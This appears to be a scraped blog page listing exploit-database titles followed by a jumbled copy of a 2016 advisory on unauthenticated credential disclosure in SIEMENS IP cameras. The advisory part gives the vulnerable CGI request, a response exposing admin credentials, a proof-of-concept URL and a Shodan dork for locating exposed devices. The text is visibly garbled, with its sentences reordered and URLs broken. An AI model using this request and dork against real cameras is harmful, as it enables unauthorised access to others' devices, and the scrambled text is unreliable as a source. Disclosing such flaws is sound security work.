![]() ![]() "PHP 5.0.0 - 'tidy_parse_file()' Local Buffer Overflow" "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" "Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure" "CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting" "Zen Load Balancer 3.10.1 - Remote Code Execution" "Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal" "Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)" "Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS)" "Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection" "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" "ChurchCRM 4.2.0 - CSV/Formula Injection" "DotCMS 20.11 - Stored Cross-Site Scripting" No rate Limit on Password Reset functionality" "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" ![]() "NewsLister - Authenticated Persistent Cross-Site Scripting" "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" "Mitel mitel-cs018 - Call Data Information Disclosure" SOLUTION = Contact the vendor for further information regarding the proper mitigation of this vulnerability. cgi ? query = ADMINID HTTP / 1.1 Host : host : port Connection : close Response : - HTTP / 1.0 200 OK Connection : close Content - type : text / html var Adm_ID = "admin" var Adm_Pass1 = “ admin ” var Adm_Pass2 = “ admin ” var Language = “ en ” var Logoff_Time = "0" Login http : // host : port / cgi - bin / chklogin. cgi ? query = ADMINID Should return some javascript variable which contain the credentials and other configuration vars : var Adm_ID = "admin" var Adm_Pass1 = “ admin ” var Adm_Pass2 = “ admin ” var Language = “ en ” var Logoff_Time = "0" Request : - GET / cgi - bin / readfile. Proof - of - Concept : = Simply go to the following url : http : // host : port / cgi - bin / readfile. Description = SIEMENS IP - Camera ( CVMS2025 - IR + CCMS2025 ) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser. CREDIT = This vulnerability was identified during penetration test by Yakir Wizman. pdf Vulnerability : Username / Password Disclosure ( Critical / High ) Shodan Dork : title : "SIEMENS IP-Camera" Date : 16 / 08 / 2016 Author : Yakir Wizman ( https : // com / in / yakirwizman ) 2. com / web / cz / cz / corporate / portal / home / produkty_a_sluzby / IBT / pozarni_a_bezpecnostni_systemy / cctv / ip_kamery / Documents / 023 _CCIS1425_A6V10333969_en. Tested on Camera types : CVMS2025 - IR, CCMS2025 ( Camera type ) Reference for CCMS2025 : https : // w5. Advisory Information = Title : SIEMENS IP - Camera Unauthenticated Remote Credentials Disclosure Vendor Homepage : https : // com Remotely Exploitable : Yes Versions Affected : x.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |